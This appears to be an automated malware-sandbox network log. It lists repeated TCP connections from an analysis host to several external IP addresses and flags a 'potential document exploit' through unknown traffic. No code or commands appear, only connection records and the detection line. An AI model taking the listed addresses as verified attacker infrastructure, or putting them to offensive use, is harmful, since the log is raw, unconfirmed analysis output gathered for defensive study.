Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
